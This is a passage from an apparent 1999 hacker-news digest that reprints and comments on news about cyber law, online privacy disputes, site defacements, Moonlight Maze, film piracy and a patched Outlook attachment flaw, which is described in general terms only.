DELHI--India's federal cabinet today approved for presentation to parliament a "cyber law" bill to facilitate electronic trade and commerce and to prevent computer crimes. "The cabinet has approved the proposal to introduce the Information Technology Bill 1999 in the next session of parliament to facilitate electronic communication, trade, and commerce and prevent computer crime in public and private [domains]," the government said in a statement. The next session of parliament is expected to convene from November 29 to December 23. A draft of the bill was ready early this year, but it could not be taken up in parliament following the collapse of the Bharatiya Janata Party-led coalition government in a confidence vote last April. The coalition won reelection in September-October elections. The information technology bill will provide an outline for legal recognition of electronic records, the statement said. "The bill provides for a legal framework so that the information is not denied legal effect, validity, or enforceability solely on the ground that it is in form of electronic records," it said. The bill draws tenets from the United Nations Commission on International Trade Law's model law on e-commerce, Utah and Illinois state laws on electronic and digital signatures, and the Electronic Transactions Act enacted by Singapore in June 1998, officials said. @HWA 23.0 Public Workshop to Discuss Web Site Profiling To Be Held ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A public workshop will be held Monday to discuss the use of online profiling by e-commerace web sites. The workshop will be held by the Federal Trade Commission and the Department of Commerce along with privacy advocates and online advertisers to discuss the use of online profiling. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2389386,00.html?chkpt=zdnntopb -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Advocates call for halt to online profiling By Jennifer Mack, ZDNN November 5, 1999 4:41 PM PT URL: The Federal Trade Commission and the Department of Commerce will hold a public workshop Monday with privacy advocates and online advertisers to discuss the use of online profiling. On Friday, privacy groups urged the FTC to immediately halt all online profiling pending an investigation, and speed up legislation that would protect consumer's privacy. The practice of creating user profiles involves gathering information on users' surfing habits, which can be used to deliver advertising targeted to people's specific interests. "The technology that's been developed over the past two years for profiling and collecting information about Web surfers has become so intrusive that these profiles are an unacceptable violation of consumer privacy," explained Jason Catlett, president of Junkbusters Corp., a privacy advocacy group. "The government needs to protect consumers from having this information assembled without their consent and control." Catlett and others say the industry's attempts to regulate itself when it comes to online privacy have been unsuccessful. He points to the industry's TRUSTe organization as an example of failed regulation. TRUSTe evaluates its members' privacy policies and allows cooperating Web sites to post a TRUSTe logo promoting their compliance. "TRUSTe doesn't do anything very useful," said Catlett. "The worst privacy violators are not going to pay TRUSTe to be looked at. So there's nothing to protect consumers from really bad violators." Online advertisers often point to users' ability to turn off information gathering "cookies" as the best way to stop sites from collecting personal data. Cookies are special tools used by Web sites that collect information about who you are and what you do when you're online. They can be deactivated by switching them off in your browser options. But Andrew Shen, policy analyst for the Electronic Privacy Information Center, believes expecting users to know how to turn off the cookie option is unreasonable. Unreasonable burden "The burden of privacy background is totally backward, said Shen. "It shouldn't be up to consumers to protect themselves." The privacy groups attending Monday's meeting with the FTC feel that the industry's standard "opt-out" policy, which requires consumers to take steps to prevent their data from being gathered, is unfair. They want Web users to be notified before information is collected and give their consent. The alternative, they feel, is the destruction of the Internet's free and open environment. "Everything on the Internet is going to be targeted towards you," said Shen. "You'll no longer be able to just browse the Net anonymously. So, in some ways, profiling really defeats what the Internet is all about." @HWA 24.0 Naval Station Upgrades Web Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Naval Station Ingleside, located near Corpus Christi Texas, has upgraded its web site security after a group seeking freedom for Kashmir, Pakistani Hackerz Club, reportedly defaced the site. Austin American-Statesman http://www.austin360.com/technology/stories/1999/11/06hackers.html Technology Texas naval base upgrades web security after being hacked Associated Press Posted: Nov. 5, 1999 CORPUS CHRISTI -- Naval Station Ingleside has upgraded its web site security after a group seeking freedom for Kashmir reportedly hacked the site. The security was upgraded after someone modified the index for the Web site and inserted a banner that popped up on the screen when a user opened the page. The banner contained a political message from the Pakistani Hackerz Club, which said it is rallying for the freedom of the Kashmir region from Indian control. By one estimate, the group has struck about 85 civilian and military sites in several nations since it began its hacking spree. That includes Lackland Air Force Base's web site. Lt. Cmdr. Kris Winter, executive officer for the ship maintenance activity at Ingleside, said the hacked site didn't contain any classified information, only public information about Shore Intermediate Maintenance Activity. Security for the site has been enhanced, she said. @HWA 25.0 Sony Reveals Addresses of 2.5 Million Subscribers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne E-mail addresses of subscribers to Sony Music's Infobeat service were exposed to advertisers, a result of a software flaw. Advertisers were able to see the e-mail addresses of those subscribers who have clicked at certain advertisements sent through Sony's mailing list. Sony claimed that all of the advertisers where contacted and that none of them collected or used this information in anyway.(Yeah right. Yo, TrustE, time for yet another investigation?) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2389775,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Sony glitch reveals subscriber e-mail addresses By Margaret Kane, ZDNN November 8, 1999 6:18 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2389775,00.html?chkpt=zdhpnews01 A software flaw allowed advertisers to view the e-mail addresses of subscribers to Sony Music Entertainment Corp.'s Infobeat service, the company said. The roughly 2.5 million users who subscribe to Infobeat get a daily e-mail update of music and entertainment news. The newsletter contains advertisements that give special URLs for interested consumers. "By clicking on select advertisements, certain advertisers had the ability to obtain the e-mail address of the user who clicked on the link," the company said in a letter to subscribers. Sony said it had recently been informed of the error and had fixed the problem, but advised subscribers to set up passwords for their accounts. The company said it contacted its advertisers, who "confirmed that they did not collect or use any of this information." Privacy issues have become a hot topic recently. Last week, RealNetworks (Nasdaq: RNWK) ran into trouble after it was disclosed that the company had been tracking data about the music its customers downloaded. Today, the Federal Trade Commission and the Commerce Department will host a workshop to review whether online profiling practices invade users' privacy. Advocates last week called for the FTC to order a halt on online profiling pending an investigation. @HWA 26.0 TrustE to Rethink Charter ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex After realising that the recent privacy fiasco perpetrated by Real Networks was outside of its joursidiction the industries self appoited privacy guardian will rethink its charter. TrustE says that itcan only investigate web sites that violate privacy issues and not music applications that work over the internet. Wired http://www.wired.com/news/technology/0,1282,32388,00.html TRUSTe Declines Real Probe by Chris Oakes 3:00 a.m. 9.Nov.1999 PST Privacy watchdog group TRUSTe declined Monday to investigate RealNetworks, but the decision has prompted the organization to expand its charter. It is the second time the group has determined that a significant privacy concern lies beyond the scope of its program. Although TRUSTe has investigated several major violations and hundreds of minor incidents, it has never revoked a Web site's right to display its privacy seal. TRUSTe conducted an initial inquiry last week into the behavior of RealNetworks' RealJukebox software, which was surreptitiously gathering data about the music-listening habits of its users and passing it on to the company. The inquiry is intended to determine if a TRUSTe member company may have violated privacy terms. RealNetworks subsequently issued a patch to keep the software from tracking the unique identifier that allowed RealNetworks to tie the tracking data to users' personal information. TRUSTe’s stated mission is to regulate the use of personal data submitted to Web sites by accepting input from consumers. TRUSTe declined to investigate RealNetworks because RealJukebox is music-listening software that works via the Internet, but only indirectly through a Web site visit. As a result, the self-monitoring group has determined that it needs to expand its program to include a wider range of data collections. "Unfortunately, yes, [the RealNetworks privacy problem] falls outside the scope of our program," said TRUSTe spokesman Dave Steer. "Because of that, we're going to be evolving the program." The "trustmark" license grants companies the right to bear a seal on their Web sites if they comply with TRUSTe’s privacy policy. The seal was designed to ensure that companies disclose their data collection practices. The same technicality has previously led the organization to back out of privacy matters that appeared on their face to be relevant to TRUSTe's mission. TRUSTe cited the scope issue when it declined to investigate a privacy question related to Microsoft's Windows registration process. When people registered their Windows software, Microsoft's registration program gathered a unique identifier from the user's disk. But, since the process didn't explicitly involve the company's Web site, TRUSTe didn't investigate. Sensing a pattern of exemptions that could limit its reach -- as well as consumer confidence in the TRUSTe seal -- the organization announced a plan to expand its scope on Monday. "The line between the data that's collected at a Web site and the data that can be collected over the Internet, such as GUID [global unique identification number], has been blurred," said TRUSTe's Steer. "That's why we're expanding the program." Steer said TRUSTe would call on experts inside and outside the Internet industry to determine how to expand the program to include the behavior of software. The behavior of Internet software, such as RealNetworks', is much more complex and less apparent, he said. When the program incorporates more kinds of Net-enabled behaviors, Truste hopes to be in a good position to monitor the increasingly omnipresent activity of data collection. "In an increasingly networked society where there are 'EZ-passes' and supermarket cards, this type of incident is going to become increasingly common. So it's time to expand the program," Steer said. TRUSTe recommended RealNetworks adopt a five-point plan that could help bolster consumer trust, given the recent problems. The TRUSTe news occurred on the same day that RealNetworks issued updated software to address a newer privacy problem affecting its streaming software product, RealPlayer. @HWA 27.0 Russians Exploited SIPRnet Gateways ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime So what exactly did the Russians get during Moonlight Maze? Where classified systems compromised? SIPRNet Breached? Passwords stolen? Why was all of DOD asked to change their passwords a few months back? It looks like Moonlight Maze had a bigger impact on US systems than originally revealed. Unauthorised connections between NIPRNet andSIPRNet may have leadtoa wider intrusion than the public was lead to believe. (Hmmm, no classified information? I wonder.) PBS - The Pulpit, by Robert X. Cringely http://www.pbs.org/cringely/pulpit/pulpit19991104.html Let Them Eat Borscht Maybe Russians Have Been Hacking DoD Servers After All, but It's Still Our Fault By Robert X. Cringely Okay, so I was wrong. No, not about Y2K. As you'll read later on, some of the most surprising people are beginning to agree with my level-headed view of that problem. Where I was wrong was in my declaration three weeks ago that even if Russians were trooping through web sites at the Pentagon as the FBI was claiming it really didn't matter. I saw this as whining on the part of a group of Federal intelligence and law enforcement officials trying to increase their own power. And it may have been all that, but it also turns out to be a lot more. My error was in basing that column on logic and not paying enough attention to human nature. The syllogism I constructed was simple: Even if programmers from the Russian Academy of Sciences were attacking Pentagon web sites, those web sites were there specifically to be attacked. The rules at the Department of Defense say that only non-classified information can be held on servers available to the public, so the DoD must simply accept the Russian invasion as fair use. Federal officials complaining about the loss of "sensitive information" had no right to complain, it seemed to me. What the Russians were doing was no more or less than what spider programs at Excite or Google are doing every day to servers all over the world. My mistake, if turns out, was in not looking further into those words "sensitive information," and in failing to remember how we tend to compromise our own systems for ease of administration. This column is apparently read in higher places than I ever expected. As a result, some significant new information has dropped into my lap. Here is what I have learned since that first column appeared. While computer systems with classified information are not supposed to be connected to the public Internet, such systems WERE connected. Pentagon webmasters gave themselves administrative access to some classified machines through unclassified machines. It wasn't malicious, just stupid, but the result was that the clever folks at the Russian Academy of Sciences (apparently they were the culprits, after all) gained root level access to a number of servers. Soon they were messing where they shouldn't have been a-messing. It's not exactly clear how much information was lost, but it could have been a lot given the fact that the "sensitive information" referred to by the FBI was a wealth of login passwords for several hundred thousand individual users at the Department of Defense. The FBI was apparently finnessing the language since passwords, which are by definition secret, aren't actually considered officially "secret." Sheesh! Once the breach was noticed, they cut the links between the secret and non-secret machines and told a few hundred thousand people to change their passwords. End of problem ... they hope. This has to be a wakeup call, though, to any organization that has information it wants to keep to itself. There are probably such administrative worm holes in most systems composed of dozens or hundreds of servers and the right kind of spider program will find them all. Well, this is the week when Judge Thomas Penfield Jackson presents his finding of facts in the Microsoft anti-trust case. It hits the fan on Friday, and apparently, officials of Microsoft and the Department of Justice have been in almost continuous negotiations trying to head off the whole thing. They are trying to come up with a consent decree that will be, in effect, an out of court settlement of case. Microsoft doesn't want to be damned by the judge, and the DoJ wants to use this to push a restructuring at the software giant. But I have to tell you, I just don't buy the idea that Bill Gates is going to agree to anything that fundamentally hurts his company. Expect no breakthrough unless it involves major government concessions. The reason I don't expect an out of court settlement is because the DoJ won't accept a cosmetic consent decree (remember this whole case came about because Microsoft was accused of violating the last consent decree), and Microsoft won't accept any agreement that has real teeth. Both sides have been molding their cases for months on the assumption that Judge Penfield Jackson will rule against Redmond on Friday. Gates already expects to be dragged through the mud and just hopes to see it all reversed by the more conservative appeals court. Remember this finding of fact is not the penalty phase of the case. That's still months away, if ever. And Microsoft has many legal weapons it can use to stall real change for years. As I have long said, the day Microsoft is broken in pieces will be the day when Bill Gates decides several little Microsofts are worth more than one big Microsoft. No matter what the judge says this week, the real power is still in Bill's hands. Finally back to Y2K. Now that Rev. Jerry Falwell has revised his alarmist and highly profitable views on Y2K, I think we can expect similar shifts on the part of other Y2K zealots. Some folks have even hinted to me that Gary North, the original Y2K extremist, would be shifting shortly. While I see no indication of that yet, I do take some comfort in knowing that Dr. North has enough confidence in the idea that maybe -- just maybe -- the world information infrastructure will remain intact enough after January 1 to allow him to continue offering TWO YEAR subscriptions to his newsletter. If anyone is going to make money from Y2K, I want it to be my favorite Marilyn Monroe imitator, Cybele, who has just released the last disco classic of the century, a little ditty called Y2Kymca.com. Download the MP3 and learn why gentlemen prefer blondes, especially blondes with accordions. @HWA 28.0 FBI Director Calls For International Cooperation on Online Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime FBI Director Louis Freeh says that tracking computer criminals should become a matter as important as foreign policy, defense, or economic issues. He is calling for increased cooperation between countries to track down and prosecute internet criminals. Rueters - Via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2389802,00.html?chkpt=zdnntop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Computer crime outrunning law enforcement By David Brunnstrom, Reuters November 8, 1999 8:04 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2389802,00.html?chkpt=zdnntop BANGKOK -- The spread of computers has made life easier for terrorists, pedophiles, drug dealers and financial fraudsters, making closer cooperation between police forces vital in the new millennium, the FBI said Monday. "Information technology, which is a wonder for the promotion of education and good things, is also used by people to do harm and commit crime," Louis Freeh, the director of the Federal Bureau of Investigation, told a news conference. "Whether you are a pedophile using the Internet, or a terrorist looking to shut down a stock exchange or the 911 emergency system...these are threats that are facilitated by globalization and information technology." International cooperation Freeh said technology now allowed someone sitting in a far-off country to use a laptop computer to steal millions of dollars from a bank in New York, or to plan chemical weapon attacks. It had progressed beyond the abilities of law enforcement to counter such threats. "So I think the millennium will require international cooperation at unprecedented levels," he said. "What has to happen is that high-level law enforcement officers, governments, presidents, prime ministers, have to ensure law enforcement issues are as important as matters of foreign policy, as defense issues and economic issues," he said. "More and more we see the developments of technical means and information technologies that allow crimes and criminals to communicate quicker than ever. "It means borders between our countries and jurisdictions between our police agencies have less and less importance. "What we need to do is to apply the rule of law and be as competent and as fast moving and as coordinated as those who would break the law using the advantages of globalization," said Freeh. A global battle Freeh was in Thailand to discuss cooperation with Prime Minister Chuan Leekpai and other officials and spoke at an International Law Enforcement Academy set up last year as a U.S.-Thai initiative. One of two worldwide -- the other is in Budapest -- it has taught some 600 students from Thailand, Laos, Vietnam, Malaysia, Singapore, Indonesia, the Philippines, China and Hong Kong. They have addressed narcotics trafficking, white-collar crime, financial investigations, trafficking of women and children, illegal migration and intellectual property rights. In Thailand, Freeh discussed anti-terrorism initiatives, the threat of biological and chemical weapons, and issues like money laundering, which Bangkok recently passed legislation to combat. He said locating the academy in Thailand showed the United States saw Thailand as "regional leader in terms of law enforcement" and praised its efforts in fighting narcotics. Freeh spoke before heading to Seoul on the last leg of an Asian tour that has taken him to Japan, the Philippines, Singapore as well as Thailand -- all, like the United States, facing problems from abuse of methamphetamines. He said it was up to producer countries, like Myanmar, to make "honest" and "sustained" efforts to combat the trade. "But the real issue has to be addressed on the consumer demand level and the United States has to do a much better job with respect to that as we ask other countries to do their share." @HWA 29.0 Lebanon Outlaws Voice Over IP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by skoubidou Last January the The Ministry of Post and Telecommunications in Lebanon banned ISPs from offering Voice over Internet services including video conferencing. This forces people in Lebanon to use the state run telephone service which charges up to 10 times the rate that the ISPs did. Lebanese Daily Star http://archive.dailystar.com.lb/leb/1999/January99/18_1_99/N11.HTM Late Update 0935EST In responce to the above action a private web site has been set up to detail how to work around the governments ban. Internet Telephony in Lebanon http://members.xoom.com/zork48 Lebanese Daily Star ; PTT Ministry bans overseas phone calls via Internet Zayan Khalil Daily Star staff The Ministry of Post and Telecommunications Saturday banned Internet service providers from offering voice communication services. The service, known as the Voice Over the Internet, provides Internet subscribers with a cheap means of calling overseas. Abdel-Monem Youssef, the ministry’s director-general of operations and maintenance, warned that Internet service providers would be prosecuted if they failed to comply with the terms and regulations of their licenses. The licenses, which were granted by the ministry, instruct Internet companies to refrain from offering voice services. Video conferencing was also prohibited. “The ministry has the exclusive right to provide international and local lines,” Mr. Youssef said. “Internet companies that don’t abide by the terms of their license are reducing the ministry’s revenues and depleting public funds.” Subscribers to the phone service make international calls from regular land lines by dialing their Internet account number followed by the phone number abroad. Unlike other Internet phone services, subscribers to the Internet phone do not require a computer to place their calls, only a regular phone. The cost is charged directly to the subscriber’s Internet access account. Following the ministry’s decision, Intracom Products announced the suspension of its phone-via-Internet service. Intracom, one of several companies that offered what it called the “i-phone service,” launched a nation-wide advertising campaign a week ago to promote the new product. An announcement on the company’s website Sunday said, “if you have any remaining i-credits on your i-phone account, they will be transferred in a few days to your Internet account.” In a statement, the company apologized to the ministry for any inconvenience caused by offering the service. Bahjat Darwish, the general manager of IntraCom Products, described his company’s license breach as a “misunderstanding with the ministry” but refused to elaborate. “We understood the ministry’s directions in a different way than they did,” said Mr. Darwish. “But we don’t want to do anything that does not suit the ministry.” However, the decision does not affect a foreign “phone over the Internet” provider, Net2-Phone Lebanon, which offers a similar service. Net2Phone is an agent for US-based International Dealers for Telecommunication (IDT). It allows customers to make telephone calls directly from their computers to regular phone numbers all over the world for a fraction of the government’s rates. The service charges 15 cents a minute for a peak-time call to the U.S. and 10 cents at reduced rates, while the i-phone charged 65 cents. Making the same call through the ministry’s operator at the 100 number would cost up to $1.40 a minute. But an expert in the information technology industry, who refused to be named, predicted that the ministry would soon interfere in the business of any company providing international calls via the Internet. “The ministry will always want to be the country’s only provider of phone lines because it cannot do the same with data transfer,” the source said. Of Lebanon’s 10 current Internet service providers, only four have access lines spread throughout the country. The service providers are generating approximately $1m a month in revenues, thanks to growing numbers of subscribers. According to ministry statistics, Lebanon has just under half of the Arab world’s 85,000 Internet subscribers. @HWA 30.0 Bond Fans Could Not Wait ? ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne The new James Bond movie "The World Is Not Enough" is now available on the net, for free. UPI,the films legal distributors, have launched an investigation to find out how a film collectors' club got hold of the video-quality copy and released on the Internet over a week before its official release. The Straits Times http://straitstimes.asia1.com/cyb/cyb2_1108.html NOV 8 1999 007 film hijacked A copy of the latest Bond movie, The World Is Not Enough, has been stolen before its official release on Nov 18, and is available free over the Internet LONDON -- The Internet bootleggers are more than a match for James Bond. A copy of one of the most widely trailed blockbusters of the year -- the latest 007 movie, The World Is Not Enough -- has been stolen before its official release and is available free over the web, reported The Sunday Times. The paper said investigators believed it was the first time a top movie had fallen victim to Internet thieves before reaching the cinemas. Experts suspect the Internet version might have been copied from a trade tape sent across the Atlantic between film executives. For movie studios, it is a nightmare come true. George Lucas, producer of the Star Wars films, said he had believed the technology would not exist for several years, but Star Wars: the Phantom Menace was being downloaded on British computers within 24 hours of its American premiere and sold on videotape at street markets before it opened here. At least Star Wars had a chance to make money before the thieves got hold of it, The Times said. The 19th Bond adventure is not due for release until Nov 18. UPI, which paid millions to distribute it, launched an investigation last week to find out how a secretive film collectors' club got hold of the video-quality copy and put it on the Internet. The Times said the theft was not for profit: Hackers prided themselves on distributing copies of movies, computer games and software before their official release. Lavinia Carey, director-general of the British Video Association, said bootlegging was a 2-billion (S$5.5-billion) business. In Malaysia, illicit copies outnumber originals by four to one. Most film companies believe distribution of movies over the Internet is inevitable. Microsoft is working on technology to allow films to be sent live into ordinary computers. One expert quoted by The Times warned: "Once that technology is in place, it will be hijacked by the pirates. They are in it for the technical challenge rather than the money -- which is why not even James Bond can beat them." It'll take four days to download the movie COPY of the latest James Bond movie -- The World Is Not Enough -- was stolen by a secretive film collectors' club. The video-quality copy was then put on the club's website on the Internet. The Sunday Times of London said it took four days to download the movie into an ordinary computer. But it added that users with ISDN telephone lines can make a copy overnight and then "burn" it onto a video CD, which can then be watched on any home computer. The website can be accessed only by people who are given its seven-digit address as a reward for supplying the club with early copies of films. The site has been closed, but the film is still being duplicated. The Times did not give the address of the website. Audiences in Singapore and Malaysia will be the first in the world to see the movie, which will be released in the two countries on Nov 18, one day before its American release. Mr Roger Pollock, managing director of United International Pictures, the film's distributor in Singapore, said last month: "The reason Singapore and Malaysia are sharing the same release date is to cut down on the potential threat of video piracy." HNN Update: contributed by Alkivar James Bond Still In The Can Yesterday HNN posted a story originally from the London Sunday Times claiming that the new James Bond Movie, The World Is Not Enough has already made it onto the internet a week before release. Today we have received email claiming that this is not true. That the London Sunday Times was inaccurate. That while pirated Internet movie sites may have a directory for the James Bond Movie there is in fact no movie in them. The Video CD Release group iGN claims that this is all a hoax perpetrated by them. @HWA 31.0 Masquerade Attack Discovered for Outlook ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench By changing the three letter extension on an email attachment it is easy to bypass MS Outlooks security features. Email attachments with the extension to .gif or .doc are ignored by Outlook and allowed to pass through its filtering system. C|net http://news.cnet.com/news/0-1003-200-1432242.html?tag=st.ne.1002.bgif.1003-200-1432242 Outlook vulnerable to masquerade attack By Stephen Shankland Staff Writer, CNET News.com November 8, 1999, 6:55 p.m. PT A prominent computer "bug hunter" has found a vulnerability that allows a malicious programmer to launch an email attack which bypasses some of the precautions built into Microsoft's Outlook software. The vulnerability smoothes the way for a new type of email-borne virus, also called a Trojan horse, and other malicious software. Microsoft Outlook is one of the most popular email programs in use. Ordinarily, when a Microsoft Outlook user clicks on a file that has been received as an "attachment," the program will ask whether the user wants to open or save the attachment. Programs which exploit the vulnerability, however, fool Outlook into executing the potentially harmful software without asking permission. Email containing a malicious payload is a popular new method of attacking computers. For example, US West's internal network had to be shut down for an evening about two weeks ago because of a self-generating attack. The attack works by disguising the true identity of an email attachment so that Outlook assumes the attached file is benign, said the discoverer, Juan Carlos Garcia Cuartango, a Spanish researcher who has found several other weaknesses in the past. The masquerade works because Outlook doesn't examine files with common "extensions." An extension is a three-letter filename suffix, such as "doc" or "gif." "Outlook does not care about what the real attachment contains. It only cares about the attached file suffix," Cuartango said in an email. Microsoft was unable to comment on the vulnerability by press time. The newly discovered problem affects Microsoft Outlook Express 4 and 5, Outlook 98, and Outlook 2000, according to Elias Levy, chief technology officer of Security Focus, a company that monitors computer security problems. There aren't yet reports of active attacks using the vulnerability, he said. "I think it's very severe," Levy said. "It could be used to create something just as bad or even worse than Melissa," he said, speaking of a virus that swept the Internet in March. Melissa was successful largely because it automatically sent copies of itself to unsuspecting users via Microsoft Outlook email software. Antivirus software initially failed to detect the virus, although Melissa ultimately proved a bonanza for antivirus companies. Since its emergence, several other variants have appeared on scene. Cuartango said he notified Microsoft of the vulnerability on October 15. The basic problem isn't being fixed by companies such as Microsoft and Netscape, Levy believes. "Cuartango and [fellow bug catcher Georgi] Guninski have shown we just have this cycle. They find a bug, the vendor patches it, a week goes by, and they find another one," Levy said. "We have to look beyond that at what's fundamentally wrong here: We have programs such as Web browsers and email clients that connect to an untrusted network from which they receive data they do not trust." Levy believes the solution is to adopt a method used by the military, in which programs run in a safe zone within a computer--a cordoned-off area where the programs have minimum privileges and can't do any damage. Sun Microsystems has taken steps in this direction with its "sandbox" area, Levy said, but there still is room for attacks that don't use Java and companies have had some difficulties in making sure Java works like it's supposed to. The Unix operating system, which is supposed to restrict the actions of computer tasks not run by the system administrator, is better than Windows, Levy said. However, it's "definitely not the solution either." The new vulnerability works through a series of disguises, Levy said. First, the malicious program is converted into a Microsoft archive format called a "cab" file. Then, the cab file is renamed with an extension of a file type that Outlook isn't concerned with (such as "jpg," "mov," or "txt"), then emailed as an attachment. When the victim clicks on the attachment, the cab file is decompressed and its contents saved to a specific location. The last stage occurs when a Javascript program in the email then can execute the potentially malicious program that was contained in the cab file. To protect against the problem, Security Focus recommends changing the default location for temporary files from TEMP or TMP to some other, unpredictable location. "You can also disable Javascript," the company said. @HWA 32.0 Feds May Create Database to Steal Privacy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Today the US House of Representatives will debate the creation a huge federal database to track and identify Americans citizens who default on student loans or who should not be receiving unemployment benefits. The database would require the Department of Health and Human Services to track the name, address, Social Security Number and employment status of people who are believed to be defrauding the government. It will then force employers to verify an applicants status with the database. (And you wonder why the government is so against privacy laws? Because shit like this would be illegal.) Wired http://www.wired.com/news/politics/0,1283,32435,00.html The Fed's Deadbeat Database by Declan McCullagh 4:00 p.m. 9.Nov.1999 PST A vast federal database will be used to identify Americans who default on student loans or who should not be receiving unemployment benefits, according to a bill scheduled for debate Wednesday by the US House of Representatives. The measure would require the Department of Health and Human Services to use a national list of current public and private-sector employees to track people suspected of cheating the government out of money. The American Civil Liberties Union and some conservative groups are trying to rally last-minute opposition to the measure, which proponents say would reduce fraud by as much as US$800 million a year. "This legislation would help turn employers' gates into government checkpoints: Today the check is whether they owe child support. Tomorrow the check is whether they can collect workman's comp. In the future the check could be even more intrusive," says Greg Nojeim, ACLU legislative counsel. As part of a sweeping 1996 welfare reform law, Congress created the "Deadbeat Dad" database to track fathers who did not pay child support. Beginning in 1997, it required HHS to set up a computer system to record names, Social Security numbers, birthdates, and employers. Phyllis Schlafly's Eagle Forum says it hopes to defeat the "Fathers Count Act", which is sponsored by Representative Nancy Johnson (R-Connecticut) and expands the use of the database. "We're opposed to expanding the use for any reason. When it was created we were told it would only be used for the purpose of tracking deadbeat dads," said the Eagle Forum's Lori Cole. The bill is designed to thwart "borrowers of loans made under title IV of the Higher Education Act of 1965 that are in default" or owe other grant money. It says information will be turned over to the Department of Education and Justice Department prosecutors. State unemployment agencies may submit a name and SSN to check if that person receiving benefits is employed or not. Under existing law, the Social Security Administration verifies that correct SSNs are listed in the database. The Treasury Department and the IRS also have full access. @HWA 33.0 CMU Invades Students Computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Carnegie Mellon University (CMU) disconnected the dorm room access of 71 students after the systems where scanned and found to have MP3 files on them. CMU claims they where pressured into the scan by RIAA (Recording Industry Association of America), who denies the accusation. Details are sketchy as to how the school actually performed the scan or if they illegally broke into the systems to gather the information. No warnings about the search was given to students which may have violated the Digital Millennium Copyright Act of 1998. It is unclear whether the school verified the legal status of each MP3 file. Some students had posted their own music and not pirated materials. (If this was done by a simple web crawler a robot.txt file should take care of it.) MP3.com http://www.mp3.com @HWA 34.0 New Privacy Alerting Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne "Enonymous Advisor" is a free internet utility that kicks in when a one opens a web page that requests personal information. It shows the web site's rating, which is based on Enonymous' evaluation of the site's privacy policies, with regards to consumer privacy. (Big whoop. The problem is that there are no laws. Companies are free to write one thing in the policy and then do another, or change the policy at anytime without notifying users.) Star Tribune http://www.startribune.com/stOnLine/cgi-bin/article?thisSlug=TECR10&date=10-Nov-1999 FYI: New firm offers privacy alerts Enonymous.com wants to give Web surfers a more complete picture of exactly how sites that collect data from users plan to use their names, e-mail addresses and any other data they collect. The company is distributing a free Internet utility called Enonymous Advisor. A computer equipped with the Advisor, which can be downloaded from http://www.enonymous.com , detects sites that request personal information. When a fill-in-the-blank form is opened on a user's Web browser, a window pops up with information about how the site rates on consumer privacy. The ratings are based on Enonymous' evaluation of the site's privacy policies. Amazon.com, Yahoo.com and Expedia.com are among about two dozen sites receiving one star each -- the lowest rank, which means that the site may share personal data without permission. The maximum rating is four stars. For example, Amazon.com's privacy policy states that it "does not sell, trade, or rent your personal information to others," but adds, "We may choose to do so in the future with trustworthy third parties, but you can tell us not to by sending a blank e-mail message to never@amazon.com.''; Amazon spokesman Paul Capelli said, "I think our policy is clearly defined, and that our customers are comfortable with it." Enonymous.com awarded four stars to sites such as eBay.com, AOL.com and Hotmail.com, which share users' information only with their permission and will contact them, via e-mail or otherwise, only with their permission. In the next year Enonymous plans to create the online equivalent of anonymous post-office boxes for people who want to receive ads without giving out their e-mail addresses. -- New York Times The Net Web hits http://www.daytradingfirms.com Still in its infancy, day trading can be a lucrative -- and volatile -- way to exploit the stock market. This site links to several firms that provide training and help execute day trades. -- Tribune Media Services @HWA 35.0 CypherPunks to Host Echelon Discussion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion The next physical meeting of the San Francisco Bay Area Cypherpunks will feature Echelon, the almost mythical global eavesdropping network. The meeting will feature a presentation by Duncan Campbell,who is considered by many to be the civilian expert on this topic. The meeting will be held on November 13, 1999. It is free and is open to the public CypherPunks Meeting http://www.freedomfighter.net/cypherpunks/991113.html @HWA 36.0 Cable And Wireless Optus Drops Legal Action Against Surfers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by marena Australia's largest ISP, Cable and Wireless Optus, suffered what they called "an unauthorized intrusion" and proceeded to file charges against seven people who had viewed user names and passwords on their site. The Web surfers claimed that there was no intrusion and that they had accidentally stumbled across an insecure web page. A page that had been left available to the public since last February. Australian Broadcasting Company http://www.abc.net.au/news/science/internet/1999/11/item19991110200840_1.htm Optus drops legal action against hackers One of Australia's largest Internet Service Providers has dropped legal action against a small group of its users who stumbled onto a site that detailed all the passwords of the company's clients. Cable and Wireless Optus launched 